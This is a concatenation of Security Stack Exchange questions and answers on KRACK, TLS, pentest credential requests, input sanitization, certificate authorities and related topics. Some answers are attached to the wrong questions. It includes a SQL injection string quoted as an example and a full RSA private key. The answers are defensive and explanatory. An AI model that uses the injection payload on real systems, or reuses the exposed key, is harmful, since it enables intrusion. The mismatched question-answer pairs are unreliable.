Following on from this question , I am unclear on which of the following steps are sufficient to protect a WPA2-based wifi connection from the KRACK flaw: Patching the AP (e.g. router) Patching the client (e.g. mobile device) Patching the AP and the client The currently most upvoted answer , citing https://www.krackattacks.com states: Both clients and access points are listed in the paper as being vulnerable. and: implementations can be patched in a backwards-compatible manner [...] To prevent the attack, users must update affected products as soon as security updates become available. [...] a patched client can still communicate with an unpatched access point, and vice versa. But this seems to leave open the question of which combination(s) of patches would be an effective fix. It's clear for example that if I were to patch my phone, it would still be able to communicate with an unpatched AP, but would that communication be secure? This is an important question, because while it is relatively easy to make sure my clients are patched once the patch is available (since the number of OS vendors are relatively small), ensuring all routers are patched (particularly in public wifi APs) seems like a much harder task due to the number and size of the vendors, and the lack of control over third party hardware.
To fully protect your network, both the device and the access point will need to be patched: Source: https://www.krackattacks.com/#faq Finally, although an unpatched client can still connect to a patched AP, and vice versa, both the client and AP must be patched to defend against all attacks!
{ "source": [ "https://security.stackexchange.com/questions/171402", "https://security.stackexchange.com", "https://security.stackexchange.com/users/17049/" ] }
171,408
Everyday we visit many websites, including our university's website, maybe Google, Yahoo, etc. But on each of them, we have a unique username, while each person in a country can have a "national code" such that no persons share a code. So, they could use their national code as their username on every website. Why not? Why isn't this the situation? Wouldn't it be better if we had one username for all of the websites in the world? Does it have something to do with security?
Privacy . Being able to link every user account to a natural person would be the end of anonymity on the Internet. Maybe you have nothing to hide, so that's of no concern for you. But as Edward Snowden said: "Arguing that you don't care about the right to privacy because you have nothing to hide is no different than saying you don't care about free speech because you have nothing to say" . Not every person on the planet would have a national ID number. There are countries in the world which don't give ID numbers to their citizens. In some regions of the world, residency registration is spotty at best or nonexistent. People from these countries could no longer actively use the Internet anymore. Also, there are edge-cases like stateless people, people with multiple citizenships or people from disputed territories. In those countries which do have ID numbers, you have the problem of proving that someone is indeed the owner of an ID number . Because your ID number is public knowledge, I could use it to register in your name on any website I want, thus stealing your identity. A solution to this problem would be a state-supported authentication service (something like OAuth). But considering how many governments there are in the world, it would be impossible to agree on a protocol standard which is supported by everyone all over the world. And if you do somehow get the ~200 or so governments in the world to cooperate on something (a feat worthy of a Nobel Peace Prize), you now put a tremendous responsibility into their hands. Not only could they very easily prevent their citizens from using any services they don't like by no longer authenticating their citizens to it, they could also impersonate their citizens on any website.
{ "source": [ "https://security.stackexchange.com/questions/171408", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102580/" ] }
171,415
I’m still in the planning stage so this may not be fully fleshed out, but I’m working on a SaaS project. Part of which allows users (customers of my SaaS) to configure my API to watch for events and respond in a preconfigured way. One response is for my API (built in PHP) to kick off a POST HTTP request to a URL provided during setup, with given parameters. It is intended that user will point these requests to their own server or other internal system and then be able to listen for these requests and integrate it with their own internal email/tracking/payment systems. However, I’m a bit worried about giving these users free reign over who they get my server to POSTs requests too. Assuming I sanitize the URL input and any parameters, and throttle the number of requests it can send out, is there any potential malicious use cases stemming from a user triggering POSTs from my API?
Privacy . Being able to link every user account to a natural person would be the end of anonymity on the Internet. Maybe you have nothing to hide, so that's of no concern for you. But as Edward Snowden said: "Arguing that you don't care about the right to privacy because you have nothing to hide is no different than saying you don't care about free speech because you have nothing to say" . Not every person on the planet would have a national ID number. There are countries in the world which don't give ID numbers to their citizens. In some regions of the world, residency registration is spotty at best or nonexistent. People from these countries could no longer actively use the Internet anymore. Also, there are edge-cases like stateless people, people with multiple citizenships or people from disputed territories. In those countries which do have ID numbers, you have the problem of proving that someone is indeed the owner of an ID number . Because your ID number is public knowledge, I could use it to register in your name on any website I want, thus stealing your identity. A solution to this problem would be a state-supported authentication service (something like OAuth). But considering how many governments there are in the world, it would be impossible to agree on a protocol standard which is supported by everyone all over the world. And if you do somehow get the ~200 or so governments in the world to cooperate on something (a feat worthy of a Nobel Peace Prize), you now put a tremendous responsibility into their hands. Not only could they very easily prevent their citizens from using any services they don't like by no longer authenticating their citizens to it, they could also impersonate their citizens on any website.
{ "source": [ "https://security.stackexchange.com/questions/171415", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83603/" ] }
171,438
From what I've read, the issue is as simple as performing step 3 of a 4-step handshake and the consequences of performing that step more than once. Considering the complexity of these kinds of algorithms, I'm somewhat surprised that it is so 'simple' of a concept. How can it be that a system of this complexity was designed without anyone thinking about what would happen if you performed the step twice? In some sense, it feels like this should have been obvious. It's not really a subtle trick, it's a relatively blatantly obvious defect, or at least that's the impression I'm getting.
The 802.11 specification that describes WPA2 (802.11i) is behind a paywall, and was designed by a few key individuals at the IEEE. The standard was reviewed by engineers, not by cryptographers. The details of the functionality (e.g. retransmission) were not widely known about or studied by security professionals. Cryptographer Matthew D Green wrote a blog post about this subject, and I think this section sums it up quite nicely: One of the problems with IEEE is that the standards are highly complex and get made via a closed-door process of private meetings. More importantly, even after the fact, they’re hard for ordinary security researchers to access. Go ahead and google for the IETF TLS or IPSec specifications — you’ll find detailed protocol documentation at the top of your Google results. Now go try to Google for the 802.11i standards. I wish you luck. The IEEE has been making a few small steps to ease this problem, but they’re hyper-timid incrementalist bullshit. There’s an IEEE program called GET that allows researchers to access certain standards (including 802.11) for free, but only after they’ve been public for six months — coincidentally, about the same time it takes for vendors to bake them irrevocably into their hardware and software.
{ "source": [ "https://security.stackexchange.com/questions/171438", "https://security.stackexchange.com", "https://security.stackexchange.com/users/26126/" ] }
171,474
Apologies if this is already answered in the whitepaper, I'm not going to get chance to read it for a few days due to a hectic schedule, but I am already fielding questions from non-techies reading non-technical media news stories making them believe that we should unplug everything and go back to trading gold. What I understand (and please correct me if I'm wrong) is that this essentially allows attackers to set up a MITM attack by forcing a new handshake between devices (yes, that's dumbed down), and that this is a flaw in the basic implementation of the encryption protocol, so it will require a firmware update to fix (yay for helping elderly family and neighbours update the firmware on their routers). I don't see how this would also invalidate the encryption used as part of TLS, but I'm far from an expert on this.
KRACK is on the Network layer of the OSI model , while TLS is on the Session layer. So no, they do not influence each other, provided that the client can not be tricked into using a non-TLS connection ( SSLstrip ). The basic threat from KRACK is that it allows an attacker to decrypt all packages on the network layer that the victim sends / receives. This includes all cleartext communication (e.g. that which many email programs still employ, local network device connections, etc.). This means that if you display the network key and an attack is seeing all your traffic they can simply make a full connection to your network and wreak havoc on it any way they see fit. If there are other vulnerabilities in the implementation (e.g., what happens in Android 6), then the attacker can even manipulate packages in transit to the victim. (both encrypted and cleartext can be manipulated). However the attacker can not read its contents if the packets themselves are encrypted by a session layer protocol (e.g. TLS). This opens up the possibility to change key values or redirect the victim to an attackers site for infection. So while it is a serious breach and must be solved as soon as possible, it should not compromise properly secured traffic. So use a VPN, HSTS , HPKP and ssh, to protect yourself and/or your users.
{ "source": [ "https://security.stackexchange.com/questions/171474", "https://security.stackexchange.com", "https://security.stackexchange.com/users/149010/" ] }
171,697
I got sent an article today ( http://hakerin.com/facebook-user-location-finder-noobs/ ). With the click-bait title "Facebook User location Finder" Of course I clicked it. Going through the "article" there is not a lot of details given. And I thought I would try it out. It basically stated that it was possible to find out the location of a Facebook user that sent you a Facebook message. Specifically, by looking at the IP addresses that appear in the "Foreign Address" column of Netstat. To find the geo-location one has to copy the last added IP address from the list into a IP address lookup tool like http://whatismyipaddress.com/ . Then copy the coordinates and use google maps to find the exact location of the person. After some time getting the preferred Netstat arguments and some filtering with awk netstat -ntpw | awk '{print $5}' . The GEO locations the IP addresses hold are mostly in America some in Ireland and some in the Netherlands. When I enter the coordinates in google maps I get unknown locations. This is just fake, right? Or did it used to work like this? If so, that would seem very concerning.
That article is wrong and that website in general seems like a very unreliable source for anything. With the netstat tool, among other stuff, you can see established TCP connections. When you use Facebook messenger (or any other chat), at least one server is between you and the person on the other side, it's not a peer-to-peer connection. Hence the IP you see using netstat is an IP of a chat server (or whatever other obscure infrastructure, not know to us simple users) that you established connection with.
{ "source": [ "https://security.stackexchange.com/questions/171697", "https://security.stackexchange.com", "https://security.stackexchange.com/users/161701/" ] }
171,698
As I understand them, SSL certificates contain a domain name, a public key and the giving CA. Why is it important to include a domain name? Why isn't it enough that the CA considers the public key as trusted and that the said server indeed has the private key associated with it?
That article is wrong and that website in general seems like a very unreliable source for anything. With the netstat tool, among other stuff, you can see established TCP connections. When you use Facebook messenger (or any other chat), at least one server is between you and the person on the other side, it's not a peer-to-peer connection. Hence the IP you see using netstat is an IP of a chat server (or whatever other obscure infrastructure, not know to us simple users) that you established connection with.
{ "source": [ "https://security.stackexchange.com/questions/171698", "https://security.stackexchange.com", "https://security.stackexchange.com/users/160109/" ] }
172,135
My bank has issued a new version of their online banking site. This new version has no virtual keyboard to enter the PIN. I asked them how are they protecting me against keyloggers but I didn't receive any answer.
Virtual keyboards were an easy-to-implement solution to malware that recorded keystrokes from the keyboard and hardware keyloggers. But the keylogger software developers quickly adjusted to this new technique (sometimes by simply taking a screenshot focused around where the mouse clicks). In the end, it is not clear that a virtual keyboard provided any broad benefit. It would certainly defeat a hardware keylogger installed on your keyboard, but that's not the likely threat. Given that keylogging software expects to also capture virtual keyboards, there is little benefit to maintaining this technology in the broad, likely scenario. Tests have been done on the effectiveness of virtual keyboards: https://www.raymond.cc/blog/how-to-beat-keyloggers-to-protect-your-identity/
{ "source": [ "https://security.stackexchange.com/questions/172135", "https://security.stackexchange.com", "https://security.stackexchange.com/users/162214/" ] }
172,148
My company is currently engaged in a security audit framed as a pentest. They've requested all admin passwords for every one of our services and all source code of our software. They want logins for Google Apps, credit card processors, GitHub, DigitalOcean, SSH credentials, database access, and much more. Note, we've never signed a single NDA (but have been provided a statement of work) and I'm very reluctant to provide this info to them because of this. Is this normal for a pentest? I assumed it would mostly be black box. How should I proceed? "UPDATE* We now have an NDA. The contract does, however, say that we can't hold them liable for anything. Still not sure if this is the right move to continue with them. In my experience, their requests aren't normal even in white box audits, and their statement of work reads in a way that doesn't make it clear if this is a white box or black box audit.
Is this normal for a pentest? Absolutely not . Best case scenario: they are performing "social engineering" penetration testing and want to see if you can be pressured into fulfilling a very dangerous action. Middle-case scenario, they don't know how to do their job. Worst-case scenario they are only pretending to be an auditing company and fulfilling their request will result in an expensive breach. In the case of a code-audit the company will obviously need access to source code. However I would expect a company who provides such services to already understand the sensitivity of such a need and have lots of forms for you to sign, and to offer to work in a strictly controlled environment. A reputable security company is going to be concerned not just with protecting you (because it is their job) but also with protecting themselves from untrustworthy clients (Our source code got leaked right after we hired you: we're suing!!!!). All this to say: any reputable security company that doesn't have you sign lots of contracts before going to work is not a reputable security company. I can't imagine any circumstances in which handing over access to any of those things would be a good idea. Edit RE: hidden contracts A few have suggested that the company might have simply not told the OP about any relevant contracts/agreements/NDAs. I suppose this is possible, but I want to clarify that the lack of a contract isn't the only red flag that I see. As someone who has built e-commerce sites and business software that has required integration with many CC Processors, I see absolutely no benefit to giving someone else access to your CC Processor. At that point in time they are no longer penetration testing your systems: they are penetration testing someone else's systems that you happen to use. Indeed, giving out access credentials in such a way likely violates the terms of service that you signed when you started using your CC Processor (not to mention the other systems they are requesting access to). So unless you have permission from your CC Processor to hand your credentials to a security auditing company (hint: they would never give you permission), giving them that access is a huge liability. Many others here have done a great job articulating the differences between white-box and black-box testing. It is certainly true that the more access you give security auditors, the more effectively they can do their jobs. However, increased access comes with increases costs: both because they charge more for a more thorough vetting, and also increased costs in terms of increased liability and increased trust you have to extend to this company and their employees. You are talking about freely giving them complete control over all of your companies systems. I can't imagine any circumstances under which I would agree to that.
{ "source": [ "https://security.stackexchange.com/questions/172148", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78761/" ] }
172,212
Verizon is modifying their "unlimited" data plans. Customers in the USA can stream video at 480p -or- pay to unlock higher resolutions (both 720p and +1080p). They are not the only mobile carrier to implement rules like this . If I am on a site that implements HTTPS for video streaming, say YouTube or Facebook, how do carriers know what resolution I'm watching? If carriers are throttling bandwidth for all data, then talking about video resolutions seems like misdirection. If it's only video, that would seem to raise privacy concerns.
This is an active area of research. I happen to have done some work in this area, so I'll share what I can about the basic idea (this work was with industry partners and I can't share the secret details :) ). The tl;dr is that it's often possible to identify an encrypted traffic stream as carrying video, and it's often possible to estimate its resolution - but it's complicated, and not always accurate. There are a lot of people working on ways to do this more consistently and more accurately. Video traffic has some specific characteristics that can distinguish it from other kinds of traffic. Here I refer specifically to video on demand - not live streaming video. Video on demand doesn't often have those priority tags mentioned in this answer . Also I refer specifically to adaptive video, meaning that the video is divided into segments (each about 2-10 seconds long), and each segment of video is encoded at multiple quality levels (quality level meaning: long-term video bitrate, codec, and resolution). As you play the video, the quality level at which the next segment is downloaded depends on what data rate the application thinks your network can support. (That's the DASH protocol referred to in this answer .) If your phone is playing a video, and you look at the (weighted moving average of) data rate of the traffic going to your phone over time, it might look something like this: (this is captured from a YouTube session over Verizon. There's the moving average over 15 seconds and also short-term average.) There are a few different parts to this session: First, the video application (YouTube player) tries to fill the buffer up to the buffer capacity. During this time, it is pulling data at whatever rate the network can support. At this stage, it's basically indistinguishable from a large file download, unless you can infer that it's video traffic from the remote address (as mentioned in this answer ). Once the buffer is full, then you get "bursts" at sort-of-regular intervals. Suppose your buffer can hold 200 seconds of video. When the buffer has 200 seconds of video in it, the application stops downloading. Then after a segment of video has played back (say 5 seconds), there is room in the buffer again, so it'll download the next segment, then stop again. That's what causes this bursty pattern. This pattern is very characteristic of video - traffic from other applications doesn't have this pattern - so a network service provider can pretty easily pick out flows that carry video traffic. In some cases, you might not ever observe this pattern - for example, if the video is so short that the entire thing is loaded into the buffer at once and then the client stops downloading. Under those circumstances, it's very difficult to distinguish video traffic from a file download (unless you can figure it out by remote address). Anyway, once you have identified the flow as carrying video traffic - either by the remote address (not always possible, since major video providers use content distribution networks that are not exclusive to video) or by its traffic pattern (possible if the video session is long, much more difficult if it is so short that the whole video is loaded into the buffer all at once)... Now, as Hector said , you can try to guess the resolution from the bitrate by looking at the size (in bytes) of each "burst" of data: From the size per duration you could make a reasonable estimate of the resolution - especially if you keep a rolling average. But, this can be difficult. Take the YouTube session in my example: Not all segments are the same duration - the duration of video requested at a time depends on several factors (the quality level, network status, what kind of device you are playing the video on, and others). So you can't necessarily look at a "burst" and say, "OK, this was X bytes representing 5 seconds of video, so I know the video data rate". Sometimes you can figure out the likely segment duration but other times it is tricky. For a given video quality level and segment duration, different segments will have different sizes (depending on things like how much motion takes place in that part of the video). Even for the same video resolution, the long-term data rate can vary - a 1080p video encoded with VP9 won't have the same long-term data rate as one encoded with H.264. The video quality level changes according to perceived network quality (which is visible to the network service provider) and buffer status (which is not). So you can look at long-term data rates over 30 seconds, but it's possible that the actual video quality level changed several times over that 30 seconds. During periods when the buffer is draining or filling as fast as possible (when you don't have those "bursts"), it's much harder to estimate what's going on in the video. To complicate things even further: sometimes a video flow will be "striped" across multiple lower-layer flows. Sometimes part of the video will be retrieved from one address, and then it will switch to retrieving the video from a different address. That graph of data rate I showed you just above? Here's what the video resolution was over that time interval: Here, the color indicates the video resolution. So... you can sort of estimate what's going on just from the traffic patterns. But it's a difficult problem! There are other markers in the traffic that you can look at. I can't say definitively how any one service provider is doing it. But at least as far as the academic state-of-the-art goes, there isn't any way to do this with perfect accuracy, all of the time (unless you have the cooperation of the video providers...) If you're interested in learning more about the techniques used for this kind of problem, there's a lot of academic literature out there - see for example BUFFEST: Predicting Buffer Conditions and Real-time Requirements of HTTP(S) Adaptive Streaming Clients as a starting point. (Not my paper - just one I happen to have read recently.)
{ "source": [ "https://security.stackexchange.com/questions/172212", "https://security.stackexchange.com", "https://security.stackexchange.com/users/162321/" ] }
172,274
As far as I remember you encrypt the message using public key and decrypt it using private key. My question is whether it is possible to get a public key from an RSA private key. For example if I have a key like this: -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQCtrKVnwse4anfX+JzM7imShXZUC+QBXQ11A5bOWwHFkXc4nTfE Or3fJjnRSU5A3IROFU/pVVNiXJNkl7qQZK5mYb8j3NgqX8zZJG7IwLJ/Pm2sRW5Q j32C/uJum64Q/iEIsCg/mJjDLh1lylEMEuzKgTdWtoeLfxDBL2AJ20qXzQIDAQAB AoGBAKNXi0GpmjnCOPDxLFg5bvQVfhLSFCGMKQny1DVEtsfgZmbixv5R2R41T4+d CHJMdEsUFFJ6I7CRLTcg1SDU8IhcAWCBRSNeVuomCHlQG16ti8HxwhiwIcjvDz/z NC2sL5ZJ2eJnhbtXLdf6pxxO1pA5vLp1AX06IaETO977XvupAkEA+ZgtGZybyUkf tEA3ekXc5eLoW+zgU0C1fATWcIZ8Iq5YV1BW+3oAzf8HgIbkQh4LM2qa6An3l+vW NXR4wICHkwJBALIhrcdJqKw36qiyenq+m78klp5SnurQifVt0Sy1GMWyOUqYz5jK t9sGo9Qn6GDuYe/XGXKWQW25PkEYXxxPPx8CQQCpICyvRidp5VrOURVGjUB5pZ+9 am02/In9V2nXJcnH1kuWHqJSFQGmlEEJHl5dTu5YEMyWnupezzd/UUThbDZxAkAz TNO5QxNalbf04YG4e9Bq2eSur+iog2pXzkqhb3404UDypNOUkz0jzOO9o8ieschu xCnGAFPTf7fYE2bAxmnNAkEA0/3bdsvJclquypqP9CQeQnxGwQtWz6+yn07gj3U1 V19mdeKCUZWklRarrcr67u9DdEx+JowyEY/ppzgeQtW01g== -----END RSA PRIVATE KEY----- can I get a public key?
can I get a public key? It's easy using openssl rsa : $ openssl rsa -in the-private-key-from-your-question.pem -pubout writing RSA key -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtrKVnwse4anfX+JzM7imShXZU C+QBXQ11A5bOWwHFkXc4nTfEOr3fJjnRSU5A3IROFU/pVVNiXJNkl7qQZK5mYb8j 3NgqX8zZJG7IwLJ/Pm2sRW5Qj32C/uJum64Q/iEIsCg/mJjDLh1lylEMEuzKgTdW toeLfxDBL2AJ20qXzQIDAQAB -----END PUBLIC KEY--- If you want to get an idea of what is contained in a key file, you can pass the -text option to see a human-readable (sort of) debug dump. This way you can see that a key file contains both private information but also the public information. Especially it contains the modulus and publicExponent which fully describe the public key: $ openssl rsa -text -in the-private-key-from-your-question.pem Private-Key: (1024 bit) modulus: 00:ad:ac:a5:67:c2:c7:b8:6a:77:d7:f8:9c:cc:ee: 29:92:85:76:54:0b:e4:01:5d:0d:75:03:96:ce:5b: 01:c5:91:77:38:9d:37:c4:3a:bd:df:26:39:d1:49: 4e:40:dc:84:4e:15:4f:e9:55:53:62:5c:93:64:97: ba:90:64:ae:66:61:bf:23:dc:d8:2a:5f:cc:d9:24: 6e:c8:c0:b2:7f:3e:6d:ac:45:6e:50:8f:7d:82:fe: e2:6e:9b:ae:10:fe:21:08:b0:28:3f:98:98:c3:2e: 1d:65:ca:51:0c:12:ec:ca:81:37:56:b6:87:8b:7f: 10:c1:2f:60:09:db:4a:97:cd publicExponent: 65537 (0x10001) privateExponent: (…)
{ "source": [ "https://security.stackexchange.com/questions/172274", "https://security.stackexchange.com", "https://security.stackexchange.com/users/162408/" ] }
172,297
If I use fully parameterized queries everywhere, is it still necessary and/or security-relevant to somehow sanitize input? E.g. check that mail addresses are valid before sending a parameterized query against the database, or filtering out certain special characters from text? I think of benign, but not-so-well-engineered 3rd party tools (maybe self-written scripts by the admin, or some fancy CrystalReports made by a non-technician) trying to consume unsanitized data from our database. Right now, we have full unicode support against SQL Server (MySQL seems to have problems with Emojis), I'm not sure how to filter out security risks without losing that property.
No, it's not necessary. But please, read on. Input sanitization is a horrible term that pretends you can wave a magic wand at data and make it "safe data". The problem is that the definition of "safe" changes when the data is interpreted by different pieces of software. Data that may be safe to be embedded in an SQL query may not be safe for embedding in HTML. Or JSON. Or shell commands. Or CSV. And stripping (or outright rejecting) values so that they are safe for embedding in all those contexts (and many others) is too restrictive. So what should we do? Make sure the data is never in a position to do harm. The best way to achieve this is to avoid interpretation of the data in the first place. Parametrized SQL queries is an excellent example of this; the parameters are never interpreted as SQL, they're simply put in the database as, well, data. For many other situations, the data still needs to be embedded in other formats, say, HTML. In that case, the data should be escaped for that particular language at the moment it's embedded. So, to prevent XSS, data is HTML-escaped at view time. Not at input time. The same applies to other embedding situations. So, should we just pass anything we get straight to the database? Maybe. It depends. There are definitely things you can check about user input, but this is highly context-dependent. Because sanitization is ill-defined and mis-used, I prefer to call this validation . For example, if some field is an supposed to be an integer, you can certainly validate this field to ensure it contains an integer (or maybe NULL). You can certainly do some validation on email fields (although some people argue there's not much you can do besides checking for the presence of a @ , and they have a good point). You can require comments to have a minimum and maximum length. You should probably verify that any string contains only valid characters for its encoding (e.g., no invalid UTF-8 sequences). You could restrict a username to certain characters, if that makes sense for your userbase. A minimum length for passwords is, of course, incredibly common. As you can see, these checks are very context-dependent. And all of them are to help increase the odds you end up with data that makes sense. They are not to protect your application from malicious input (SQL injection, XSS, command injection, etc), because this is not the place to do that. Users should be free to type '; DROP TABLE users; -- without their post being rejected or mangled to \'; DROP TABLE users; -- . Note that I'm able to include such "malicious" content on sec.SE! So, to answer your original question: ... is it still necessary and/or security-relevant to somehow sanitize input? No, it is not. But please do properly escape the data where needed before outputting it. And consider validations, where applicable. I think of benign, but not-so-well-engineered 3rd party tools (maybe self-written scripts by the admin, or some fancy CrystalReports made by a non-technician) trying to consume unsanitized data from our database. Then escape or filter the data before outputting to those tools, but don't mangle data in your database. But really, those scripts should be fixed, or rewritten with security in mind. (MySQL seems to have problems with Emojis) Little off-topic, but have a look at the utfmb4 charset for MySQL ;)
{ "source": [ "https://security.stackexchange.com/questions/172297", "https://security.stackexchange.com", "https://security.stackexchange.com/users/37853/" ] }
172,466
We have been contacted by an "independent security researcher" through the Open Bug Bounty project. First communications were quite OK, and he disclosed the vulnerability found. We patched the hole and said "thank you", but declined to pay a donation (see below). The researcher then sent a follow up email saying that he has found more vulnerabilities, but because we didn't make a donation, he will keep those vulnerabilities for himself. In other words, he only told us he had more vulnerabilities, but would not disclose them, after we made the decision to not pay the suggested voluntary donation. To my understanding, this is no longer in line with responsible white hat behavior. Am I right in this assertion? Update Yes, the person has been quite explicit in the suggested amount for the donation. The various reasons include for not paying the requested 'donation' are: the suggested height of the 'voluntary donation' in combination with the severity of the vulnerability found, the vulnerability in question was, according to our logs, not found by a 'highly skilled' individual, but rather by an automated tool, the fact that the Open Bug Bounty project explicitly mentions that no payment is required, the passive aggressive tone of voice. The above, in combination with the fact that, while we are in the process of setting up a bug-bounty budget and associated policy, we haven't completed this yet. Let's be clear: we did not set a bounty, nor promise one and we did not sign up for this project. The Open Bug Bounty project is an unaffiliated project, that explicitly says: " There is, however, absolutely no obligation or duty to express a gratitude ". Also, note: While I'm in support of some sort of legal framework to protect bona fide security researchers, this legal framework does not, at this moment, exist in our jurisdiction; a fact our legal person was all too keen to point out.
I'm a bug hunter and I have no idea why everybody here thinks it's perfectly fine of him to attack your website without permission, determine a bounty amount himself, and threaten to hold back potentially dangerous flaws because he doesn't get the money he wants. Why didn't he ask about your policy beforehand? You never claimed to run a bug bounty program, or to be able to pay anyone for anything in the first place. To clarify again, OP did not sign up for the Open Bug Bounty project. The project offers to be an intermediary between researchers and websites that don't run a bounty program. Also, they explicitly mention that you are not obliged to pay anything, and the researcher should be well aware of that if he read the guidelines. A website owner can express a gratitude to the researcher in a way s/he considers the most appropriate and proportional to the researcher's efforts and help. We encourage website owners to say at least a “thank you” to the researcher or write a recommendation in the researcher’s profile. There is, however, absolutely no obligation or duty to express a gratitude. (Emphasis my own) If he expects a monetary reward, he should be searching for bugs at companies that actually run a bounty program. There are plenty of reputable programs paying high rewards. The researcher then sent a follow up email saying that he has found more vulnerabilities, but because we didn't make a donation, he will keep those vulnerabilities for himself. If he already found them and it's not much effort to put them in a list and let you know, then yes, I find it unethical to hold the bugs back. 1 You didn't ask him to do work for you. He could have inquired if you pay for bugs beforehand. And he didn't so much offer you his expertise for a donation - from your description it sound more like a mild threat that if you don't pay him, your website is in danger. Take that incident as a hint that you need to invest more in your security. Consider setting up a real bug bounty program with small bounties or hiring a professional penetration tester. But don't let him extort money from you if you never promised any. 1 It's not that he should do free work for you. It's the fact that he mentions that there is something he won't tell you unless you pay him a particular amount that makes it unethical, especially if an exploitation of these bugs could threaten the future of your company.
{ "source": [ "https://security.stackexchange.com/questions/172466", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2113/" ] }
172,532
We want to protect a game that is basically sold with the computer containing it. The security is done this way: The HDD is encrypted using hardware TPM 1.2, which holds a unique key to decrypt the OS only in that specific computer. So Windows will boot only in one PC. Also the TPM will not let Windows boot if any hardware change happens. explorer.exe is replaced by game.exe , The system boots the game at startup. If you exit the game there is no explorer, just a black screen. Ctrl & Alt & other keys are disabled, so the Task Manager is not accessible. The ethernet adapter is disabled, autorun is disabled to prevent dumping game.exe . Deep freeze installed, user can't enter Safe or Repair modes Is this a secure system? If it is not secure, what can an attacker do?
We can analyze your setup by comparing it against a system known to be not tamper proof, the Sony PlayStation 3. OS control You have no control over the OS. Sony did write the OS themselves. Size of the OS The PS3 OS can be very simple as it just needs to boot games. Windows is a generic OS, with many, many functions. This exposes many API's. Shell The PS3 OS shell is intended to just start games. On Windows, the default UI is provided by Explorer. You propose to replace it, which isn't a design goal for Microsoft. It may appear to work, but tearing out Explorer may leave some open interfaces. That is a special problem for you because such open interfaces may become attack vectors. Hardware You appear to be working of a standard PC hardware, just with TPM. Sony had designed the PS3 from the start in the assumption that hackers would be attacking the hardware. Your standard PC probably has PCI-e slots. Those support DMA. Using that, you gain access to the PC's memory. This will be unencrypted. A common way to do this is via FireWire. IIRC, modern consoles now keep the RAM encrypted as well, and they obviously don't grant DMA access to outside hardware. Conclusion Your system appears less safe than a PS3, and a PS3 can be hacked, so it is safe to assume yours can be too.
{ "source": [ "https://security.stackexchange.com/questions/172532", "https://security.stackexchange.com", "https://security.stackexchange.com/users/162724/" ] }
172,553
There have been ads on the radio recently for a wifi enabled toy called Talkies , which are advertised as being able to communicate with app enabled phones, with a "trusted circle" that other phones can be added to. (Obligatory photo of a cute wifi enabled critter) Especially considering the Krack vulnerability , and the known process of " grooming " a child that a sexual or other predator goes through to gain their trust and exploit them ( Here is a story about how Snapchat was used), is this a toy that I should steer away from for my child? (3 years old currently)
Be very, very careful. It's not KRACK that is the problem, it is a lax attitude to security and privacy in general. So called "smart" consumer products can often be hijacked, accessed from the internet, or monitored. As a customer, it is hard to know if any specific product is safe or not. The Norwegian Consumer Council has been on the case for a while, and produced a few horror stories. From a report, aptly titled #ToyFail , on three "smart" dolls: When scrutinizing the terms of use and privacy policies of the connected toys, the NCC found a general disconcerting lack of regard to basic consumer and privacy rights. [...] Furthermore, the terms are generally vague about data retention, and reserve the right to terminate the service at any time without sufficient reason. Additionally, two of the toys transfer personal information to a commercial third party, who reserves the right to use this information for practically any purpose, unrelated to the functionality of toys themselves. [I]t was discovered that two of the toys have practically no embedded security. This means that anyone may gain access to the microphone and speakers within the toys, without requiring physical access to the products. This is a serious security flaw, which should never have been present in the toys in the first place. And from an other of their reports, again aptly named #WatchOut , on "smart" watches for kids: [T]wo of the devices have flaws which could allow a potential attacker to take control of the apps, thus gaining access to children’s real-time and historical location and personal details, as well as even enabling them to contact the children directly, all without the parents’ knowledge. Additionally, several of the devices transmit personal data to servers located in North America and East Asia, in some cases without any encryption in place. One of the watches also functions as a listening device, allowing the parent or a stranger with some technical knowledge to audio monitor the surroundings of the child without any clear indication on the physical watch that this is taking place. And the FBI agrees : Smart toys and entertainment devices for children are increasingly incorporating technologies that learn and tailor their behaviours based on user interactions. These features could put the privacy and safety of children at risk due to the large amount of personal information that may be unwittingly disclosed. So unless you have a real need (other than "this is cool") for these kinds of products, I would say that your best approach is to simply stay away from them.
{ "source": [ "https://security.stackexchange.com/questions/172553", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16555/" ] }
172,895
Why do people trust companies in countries with big surveillance programs like the US? Many US Certificate Authorities secure the web for live SSL/TLS connections. Still, a NSL would be enough for the government to gain the right to intercept the traffic legally. So why does anybody even assume that US CAs are remotely private? Why do big companies and other (illegal) organizations where privacy is a big factor not fully use CAs from countries with strict privacy laws like Switzerland or Sweden?
Why do big companies (...) not fully use CAs from countries with strict privacy laws like Switzerland or Sweden? Because any CA can issue a certificate for any domain anyway (with some caveats). If your ISP wanted to intercept all your future connections to https://example.com/ by exchanging its certificate with a rogue one, they wouldn't have to ask the original issuer of the certificate for help. They just needed to get any issuer in your local root certificate store to issue the certificate, and your browser would accept it as valid (you'd see the green lock icon and not be aware of the attack without examining the certificate). So switching to a more reliable CA wouldn't help the site owner a whole lot against a government actor. (If you personally distrust some CAs, you could also revoke their trust locally in your root cert store.) Instead, what a site owner can do is use certificate / public key pinning . E.g., a website can send a HPKP header to announce hashes of public keys that must be part of the certificate chain when connecting to the site. If a site has implemented HPKP correctly and your browser is aware of the pins (either by having seen the header before or by preloading ), a rogue certificate would be rejected by the browser even if it was issued by a trusted CA because the attacker (or any CA) can't produce one whose fingerprint matches the pin.
{ "source": [ "https://security.stackexchange.com/questions/172895", "https://security.stackexchange.com", "https://security.stackexchange.com/users/141553/" ] }
173,011
I work at a small nonprofit and woke up to find that many of our email addresses have been sending spam asking recipients to open an attachment (doc file). We have a local network that all of our computers are connected by. I'm not sure about the security of it. We also have our website and emails managed by a third party. Is this issue more likely to be caused by our local network being compromised or the web server?
Email addresses do not send spam. Email servers do. Anybody can forge your email address as the From address without hacking you at all. That's how you get spam all the time that says it comes from you. You can however tell from the email headers what servers it was sent through. Best thing to do would be to contact the third party that is hosting your email. Ideally, send them a copy of the headers from one of these spam emails. They will be able to tell where the emails are coming from. In fact, if they are coming from your website or a local computer sending email, they'll probably be contacting you eventually, since it will start getting their mail servers blacklisted eventually.
{ "source": [ "https://security.stackexchange.com/questions/173011", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163312/" ] }
173,013
